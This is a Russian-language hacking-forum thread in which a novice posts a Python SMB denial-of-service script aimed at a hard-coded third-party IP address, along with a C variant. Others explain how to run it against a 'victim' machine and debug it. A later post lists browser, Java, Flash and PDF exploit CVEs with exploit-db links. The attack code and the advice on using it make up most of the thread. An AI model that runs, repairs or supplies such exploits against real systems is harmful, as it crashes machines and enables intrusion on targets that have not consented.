HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.02.2011, 10:57
red_fox
Новичок
Регистрация: 22.02.2011
Сообщений: 4
Провел на форуме:
1039

Репутация: 0
По умолчанию

Добрый день !

Я новичок в плане взлома да и вобще )

Мне конечно очень понравилась программа Metasploit framework, но всех эксплоитов которые там находятся, не совсем хватает, по этому я порылся в гугле и т.д. в итоге нашел эксплоит для ОС windows 7

его содержание такое :

from socket import socket

host = "92.54.70.230", 445

buff = (

"\x00\x00\x00\x90" # Begin SMB header: Session message

"\xff\x53\x4d\x42" # Server Component: SMB

"\x72\x00\x00\x00" # Negociate Protocol

"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853

"\x00\x26"# Process ID High: --> normal value should be "\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\ xff\xfe"

"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\ x45\x54"

"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\ x20\x31"

"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\ x30\x00"

"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\ x20\x57"

"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\ x31\x61"

"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\ x02\x4c"

"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\ x20\x4c"

"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\ x32\x2e"

"\x30\x30\x32\x00"

)

s = socket()

s.connect(host)

s.send(buff)

s.close()



я так понимаю он написан на python ...

пытаюсь запустить с консоли и вот что получаю :

from: can't read /var/mail/socket

host: couldn't get address for '92.54.70.230,': not found

/home/blood/1st.py: строка 4: ошибка синтаксиса около неожиданной лексемы `('

/home/blood/1st.py: строка 4: `buff = ('


ладно ... дальше пробую запустить сначала python и потом из него мой файл :

Python 2.6.6 (r266:84292, Sep 15 2010, 15:52:39)

[GCC 4.4.5] on linux2

Type "help", "copyright", "credits" or "license" for more information.

>>>

'/home/blood/1st.py'

>>>


и ничего

подскажете пожалуйста как мне быть?? что бы я мог использовать сторонние эксплоиты ...

Зарание благодарен...
 
Ответить с цитированием

  #2  
Старый 23.02.2011, 14:31
omg_it_glowZ
Познающий
Регистрация: 29.01.2011
Сообщений: 38
Провел на форуме:
12399

Репутация: -2
По умолчанию

Я не спец конечно, но может надо Python 3k?

Просто предположение
 
Ответить с цитированием

  #3  
Старый 24.02.2011, 02:14
usr-bin
Новичок
Регистрация: 17.09.2010
Сообщений: 22
Провел на форуме:
8038

Репутация: 5
По умолчанию

Цитата:
Сообщение от red_fox  
>>>

'/home/blood/1st.py'

>>>

и ничего
Это значит что сплойт выполнился и сплойт на дос атаку чтоб проверить его работу лучше быть за компом жертвы чтоб понять. Есть так-же вариант что smb блокируеться фаером попробуй на виртуалке потестить или на большом количестве компов.
 
Ответить с цитированием

  #4  
Старый 24.02.2011, 10:30
red_fox
Новичок
Регистрация: 22.02.2011
Сообщений: 4
Провел на форуме:
1039

Репутация: 0
По умолчанию

По идее на компе жертвы появится BSOD , но пинг показывает что живой , спасибо usr-bin,

я теперь хотя бы знаю чем юзать подобные сплойты ...
 
Ответить с цитированием

  #5  
Старый 24.02.2011, 11:47
red_fox
Новичок
Регистрация: 22.02.2011
Сообщений: 4
Провел на форуме:
1039

Репутация: 0
По умолчанию

Но как быть с этим ???

[COLOR="Green"]char buff[] =

"\x00\x00\x00\x90"

"\xff\x53\x4d\x42"

"\x72\x00\x00\x00"

"\x00\x18\x53\xc8"

"\x00\x26"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\ x ff\xfe"

"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\ x 45\x54"

"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\ x 20\x31"

"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\ x 30\x00"

"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\ x 20\x57"

"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\ x 31\x61"

"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\ x 02\x4c"

"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\ x 20\x4c"

"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\ x 32\x2e"

"\x30\x30\x32\x00";

int main(int argc, char *argv[]) {

if (argc >>

>>> '/home/blood/1st.py'

'/home/blood/1st.py'

>>>
 
Ответить с цитированием

  #6  
Старый 25.02.2011, 21:29
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863

Репутация: 80
По умолчанию

Так это вообще код на С++. Ты что, его через Питон "пропускаешь"?

Их можно запускать через программу lcc.exe. Почитай тему /thread26510.html
 
Ответить с цитированием

  #7  
Старый 07.04.2016, 18:29
afonn
Участник форума
Регистрация: 10.08.2015
Сообщений: 117
Провел на форуме:
34692

Репутация: 0
По умолчанию

кому надо

[B]

MDAC CVE-2006-0003 https: //www.exploit-...exploits/16561/Microsoft Internet Explorer - COM CreateObject выполнение кода

PDF CVE-2010-0188 https: // WWW .exploit -... эксплойты / 16670 /Adobe Acrobat Bundled LibTIFF переполнением целочисленного

Java CVE-2011-3544 по протоколу HTTPS: //www.exploit-...exploits/18171/Java Applet Rhino Script Engine Удаленное выполнение кода

FF CVE-2012- 1710 * Mozilla Firefox использовать против плагинов уязвимости Oracle

Java CVE-2012-0507 https: //www.exploit-...exploits/18679/Java AtomicReferenceArray Тип Нарушение Уязвимость

IE CVE-2013-0074 по протоколу HTTPS: //www.exploit- ... подвигах / 29858 /Microsoft Internet Explorer - COALineDashStyleArray небезопасный доступ к памяти (MS12-022)

IE CVE-2013-0322 https: //www.exploit-...exploits/32904/Microsoft Internet Explorer - CMarkup Use-вечернюю Free (MS14-012)

IE CVE-2013-1347 https: //www.exploit-...exploits/25294/Microsoft Internet Explorer CGenericElement Объект Use-After-Free уязвимости

Java CVE-2013-1493 https: // WWW. эксплуатируют -... эксплойты / 24904 /Java CMM удаленное выполнение кода

Java CVE-2013-2423 https: //www.exploit-...exploits/24976/Java Applet Отражение Тип Путаница удаленное выполнение кода

JRE CVE-2013-2465 по протоколу HTTPS : //www.exploit-...exploits/27705/удаленное выполнение кода уязвимости в Oracle JRE

IE CVE-2013-2551 https: //www.exploit-...exploits/26175/Microsoft Internet Explorer - COALineDashStyleArray Целочисленное переполнение ( MS13-009)

FF CVE-2013-3993 * Mozilla Firefox использовать против плагинов уязвимости IBM

Flash - CVE-2014-0497 https: //www.exploit-...exploits/33212/Adobe Flash Player Integer Underflow удаленное выполнение кода

IE CVE -2014-6332 https: //www.exploit-...exploits/35229/Microsoft Internet Explorer
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.